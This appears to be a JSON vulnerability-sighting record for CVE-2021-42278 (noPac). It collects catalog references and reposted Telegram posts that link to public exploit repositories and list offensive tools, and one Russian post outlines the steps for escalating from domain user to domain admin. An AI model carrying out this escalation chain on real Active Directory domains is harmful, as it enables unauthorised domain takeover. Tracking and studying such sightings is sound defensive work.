{"vulnerability": "CVE-2021-42278", "sightings": [{"uuid": "6cec10cd-1b2a-48df-bed7-4420a44f6891", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "MISP/99138053-ae5d-4bcf-b2f8-0954edb204bc", "content": "", "creation_timestamp": "2022-11-01T20:54:34.000000Z"}, {"uuid": "bb17bc79-8adb-4f82-a1be-07a2a2ade403", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "MISP/095ab3f1-cbae-4b5c-8534-34d42a458aa5", "content": "", "creation_timestamp": "2022-05-12T16:19:54.000000Z"}, {"uuid": "89c90c04-4155-4c19-93b0-373aebcf9f56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "MISP/aaf97b2c-ad16-4ce6-928a-a440112d0fd3", "content": "", "creation_timestamp": "2024-09-16T19:13:31.000000Z"}, {"uuid": "71925ffc-b224-45bd-8120-b640c68fe594", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "8c1b6d61-b01a-4d9a-8903-212e949e2fe6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971506", "content": "", "creation_timestamp": "2024-12-24T20:30:20.615736Z"}, {"uuid": "57d09e2b-ebe5-4a51-9911-a7de0a8e6d46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1242", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDetection script for CVE-2021-42278 and CVE-2021-42287\nURL\uff1ahttps://github.com/cybersecurityworks553/noPac-detection", "creation_timestamp": "2021-12-27T13:13:28.000000Z"}, {"uuid": "b89f3302-8567-4a8c-9054-7e16507f39be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:32.000000Z"}, {"uuid": "2c76acc1-604d-46df-a928-81f9b204834e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-42278", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/58d684a4-6004-4cad-8944-7854b924424e", "content": "", "creation_timestamp": "2026-02-02T12:27:52.574993Z"}, {"uuid": "083e4900-1c70-4d29-902b-5987c9a4ee62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3li5i54s5sp2p", "content": "", "creation_timestamp": "2025-02-14T15:06:50.991610Z"}, {"uuid": "2d69760f-d53a-4a9a-b124-5da3ad1fc10f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-7358d820-9e7295ee585c5d83", "content": "", "creation_timestamp": "2025-04-30T17:58:26.811833Z"}, {"uuid": "ac2f23fc-6cba-4d0e-a639-d01c67d5956d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://gist.github.com/strikoder/99635df00444bbf5fc90ca83ec8051a0", "content": "", "creation_timestamp": "2025-12-01T12:02:42.000000Z"}, {"uuid": "8c0fddd8-e5bd-4bf3-a11c-8572cb67cf1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "63761362-71b8-4be0-853e-33e31881a2ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1009", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \nURL\uff1ahttps://github.com/Ridter/noPac", "creation_timestamp": "2021-12-13T10:29:48.000000Z"}, {"uuid": "13d7f757-97ad-42b9-ba3d-246b93fe0075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/952", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-42287/CVE-2021-42278 Scanner & Exploiter.\nURL\uff1ahttps://github.com/cube0x0/noPac", "creation_timestamp": "2021-12-11T19:44:35.000000Z"}, {"uuid": "454dcc35-104c-4d52-b92f-754b122b6d53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/habr_com_news/2245", "content": "\u200bMicrosoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e \u0431\u0430\u0433\u0430\u0445 Active Directory, \u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u0435\u043d \u0437\u0430\u0445\u0432\u0430\u0442 \u0434\u043e\u043c\u0435\u043d\u0430 Windows\n\n9 \u043d\u043e\u044f\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430 \u0431\u044b\u043b\u0438 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u044b 2 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: CVE-2021-42278 \u0438 CVE-2021-42287, \u0430 12 \u0434\u0435\u043a\u0430\u0431\u0440\u044f \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430 \u0441\u0445\u0435\u043c\u0430 \u0432\u0437\u043b\u043e\u043c\u0430. \u042d\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0432\u044f\u0437\u043a\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0440\u043e\u043b\u044c \u0434\u043e\u043c\u0435\u043d-\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u043e\u043c. 20 \u0434\u0435\u043a\u0430\u0431\u0440\u044f Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u043f\u043e \u043d\u0430\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432.\n\n#Microsoft #Windows #\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c", "creation_timestamp": "2021-12-22T04:19:44.000000Z"}, {"uuid": "9f4a5bc9-2e67-46c6-ba5c-e51073eed620", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1021", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-42278 and CVE-2021-42287\nURL\uff1ahttps://github.com/waterrr/noPac", "creation_timestamp": "2021-12-13T15:27:32.000000Z"}, {"uuid": "d2cc44b9-1e41-466a-832b-ac82fb93a564", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8415", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 noPac: CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter. Yet another low effort domain user to domain admin exploit.\nIf a Domain Controller is vulnerable it will return a TGT without a PAC, all eyes on small size tickets.\n\nhttps://github.com/cube0x0/noPac", "creation_timestamp": "2021-12-13T18:21:34.000000Z"}, {"uuid": "0a9694fd-95f0-4a5f-a0ca-62243b38a18e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/NinjaSec/348", "content": "Offensive Security (for exams like OSCP, OSWE, OSEP, etc.). \n\n\nPowerful Offensive Security Tools\n\n1. DeathStar \u2013 Automated AD privilege escalation\nhttps://github.com/byt3bl33d3r/DeathStar\n\n\n2. Frogger \u2013 Lateral movement visualizer for BloodHound\nhttps://github.com/FSecureLABS/Frogger\n\n\n3. InSpy \u2013 LinkedIn-based OSINT tool for target enumeration\nhttps://github.com/leapsecurity/InSpy\n\n\n4. NoPac-Tool \u2013 Exploits CVE-2021-42287 & CVE-2021-42278 (Kerberos)\nhttps://github.com/Ridter/noPac\n\n\n5. LaZagne \u2013 Credential recovery from local machines\nhttps://github.com/AlessandroZ/LaZagne\n\n\n6. Egress-Assess \u2013 Test outbound firewall egress rules\nhttps://github.com/FortyNorthSecurity/Egress-Assess\n\n\n7. SessionGopher \u2013 Gathers saved session data\nhttps://github.com/fireeye/SessionGopher\n\n\n8. RustScan \u2013 Lightning-fast modern port scanner\nhttps://github.com/RustScan/RustScan\n\n\n9. Grouper2 \u2013 Active Directory ACL auditing\nhttps://github.com/l0ss/Grouper2\n\n\n10. ADACLScanner \u2013 Find misconfigured ACLs in AD\nhttps://github.com/canix1/ADACLScanner\n\n\n11. CredNinja \u2013 Brute-forces AD credentials over SMB\nhttps://github.com/byt3bl33d3r/CredNinja\n\n\n12. PetitPotam \u2013 Coerce NTLM authentication via MS-EFSRPC\nhttps://github.com/topotam/PetitPotam\n\n\n13. ZAP CLI \u2013 Command-line tool for OWASP ZAP automation\nhttps://github.com/Grunny/zap-cli\n\n\n14. Brutespray \u2013 Combines Nmap and Hydra for bruteforcing\nhttps://github.com/x90skysn3k/brutespray\n\n\n15. Chankro \u2013 DLL sideloading helper tool\nhttps://github.com/ivan-sincek/chankro\n\n\n16. 0d1n \u2013 Web application brute-forcing tool\nhttps://github.com/danielmiessler/0d1n\n\n\n17. Silenthound \u2013 BloodHound alternative using .NET\nhttps://github.com/dievus/silenthound\n\n\n18. LDAPDomainDump \u2013 Dumps Active Directory info via LDAP\nhttps://github.com/dirkjanm/ldapdomaindump\n\n\n19. SharpView \u2013 AD enumeration using C# (OPSEC-safe alternative to PowerView)\nhttps://github.com/tevora-threat/SharpView\n\n\n20. SharpHound.ps1 \u2013 Standalone version for stealthier BloodHound collection\nhttps://github.com/BloodHoundAD/BloodHound\n\n\n21. Nishang \u2013 PowerShell for offensive use\nhttps://github.com/samratashok/nishang\n\n\n22. PowerSharpPack \u2013 Collection of PowerShell offensive tools\nhttps://github.com/S3cur3Th1sSh1t/PowerSharpPack\n\n\n23. EvilClippy \u2013 Weaponize MS Office documents\nhttps://github.com/outflanknl/EvilClippy\n\n\n24. PSAttack \u2013 PowerShell attack toolkit\nhttps://github.com/jaredhaight/PSAttack\n\n\n25. Praeda \u2013 Collects sensitive info from embedded devices\nhttps://github.com/percx/Praeda\n\n\n#HackersFactory", "creation_timestamp": "2025-06-20T22:08:37.000000Z"}, {"uuid": "28bc6665-bca3-4408-82c8-bf4ed165e61e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1116", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user \nURL\uff1ahttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2021-12-16T14:49:25.000000Z"}, {"uuid": "387f7a84-731a-4477-8b96-76b7dafef3b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/b4ckc0nn3ct/31", "content": "#activedirectory #ad #pentest #windows\nSAM THE ADMIN\n\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435\n\u0423\u0441\u043b\u043e\u0432\u0438\u044f \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438:\n1. \u041e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u043f\u0430\u0442\u0447\u0430 \u043d\u0430 CVE-2021-42278\n2. \u0423\u0447\u0435\u0442\u043a\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0441 \u043f\u0440\u0430\u0432\u043e\u043c \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u043e\u0432 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\n\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n\n\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Pachine\n\u0410\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b:\nnoPac.py\nnoPac.exe\nsam-the-admin", "creation_timestamp": "2023-05-21T04:48:36.000000Z"}, {"uuid": "e2ffcfce-e7e6-495c-970d-cdb2458e3af5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2766", "content": "Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)\n\n\u0422\u0430\u043a\u043e\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 \u0434\u0432\u0430 \u0433\u043e\u0434\u0430, \u043e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u043e\u0442 \u0441\u043f\u043e\u0441\u043e\u0431 \u0430\u043a\u0442\u0443\u0430\u043b\u0435\u043d \u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439. \u0410 \u043a\u0430\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b \u043e\u043d\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442?\n\n1. \u041f\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0443 \u0432 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445, \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0434\u043e\u043c\u0435\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u0438\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043a AD \u0442\u043e\u043b\u044c\u043a\u043e 10 \u0440\u0430\u0437. \n\u0427\u0442\u043e\u0431\u044b \u044d\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443:\n\nGet-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota\n\n\u0427\u0442\u043e\u0431\u044b \u043e\u0442\u043b\u0438\u0447\u0430\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e\u0442 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432, \u043e\u043d\u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u0438\u043c\u0435\u0442\u044c \u0432 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0435 sAMAccountName \u043d\u0430 \u043a\u043e\u043d\u0446\u0435 $. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u0440\u0438\u043a\u043e\u043b \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0441\u0438\u043c\u0432\u043e\u043b \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f. \u0410\u0442\u0440\u0438\u0431\u0443\u0442\u043e\u043c \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f sAMAccountName. \u042d\u0442\u043e\u0442 \u0430\u0442\u0440\u0438\u0431\u0443\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0438 \u043e\u0442\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0440\u0443\u0447\u043d\u0443\u044e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ADSIEdit Tool\n\n2. \u041f\u0440\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u0431\u0438\u043b\u0435\u0442\u0430 \u043d\u0430 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0435 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0440\u0435\u0434\u044a\u044f\u0432\u0438\u0442\u044c TGT. \u0415\u0441\u043b\u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d KDC, KDC \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u0441 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c $. \u0415\u0441\u043b\u0438 TGT \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u0434\u043b\u044f username, \u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c username \u0443\u0434\u0430\u043b\u0435\u043d, \u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u044d\u0442\u043e\u0442 TGT \u0434\u043b\u044f \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0447\u0435\u0440\u0435\u0437  S4U2self  \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e KDC \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043a\u0430\u0442\u044c username$ \u0432 AD. \n\n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u044f\u044f \u044d\u0442\u0438 \u0432\u0443\u043b\u043d\u044b, \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a\u043e\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 TGT. \u0417\u0430\u0442\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u0430\u0442\u044c\u0441\u044f \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0438\u043b\u0438 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u0443\u044e \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430. \u041f\u043e\u043b\u0443\u0447\u0438\u0432 TGT, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043d\u0430\u0447\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c sAMAccountName. \u0410 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0437\u043d\u0430\u044f, \u0447\u0442\u043e KDC \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u0438\u043a\u0435\u0442\u044b \u0438 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u0441\u0435\u0430\u043d\u0441\u043e\u0432\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u043c \u0432 \u0434\u043e\u043c\u0435\u043d\u0435, \u043c\u044b \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439\n\n\u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0442\u0430\u043a:\n\n1. \u0412 \u0434\u043e\u043c\u0435\u043d \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n2. \u0421\u043e\u0437\u0434\u0430\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u0438 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430\n3. \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f Kerberos TGT \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n4. \u0421\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0435 \u0438\u043c\u044f \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0441\u043d\u043e\u0432\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0435  \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435.\n5. \u0421\u0435\u0440\u0432\u0438\u0441\u043d\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 Kerberos \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f S4U2self\n\n\u0417\u0432\u0443\u0447\u0438\u0442 \u0434\u0443\u0448\u043d\u043e, \u0431\u043b\u0430\u0433\u043e \u0435\u0441\u0442\u044c noPac, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e 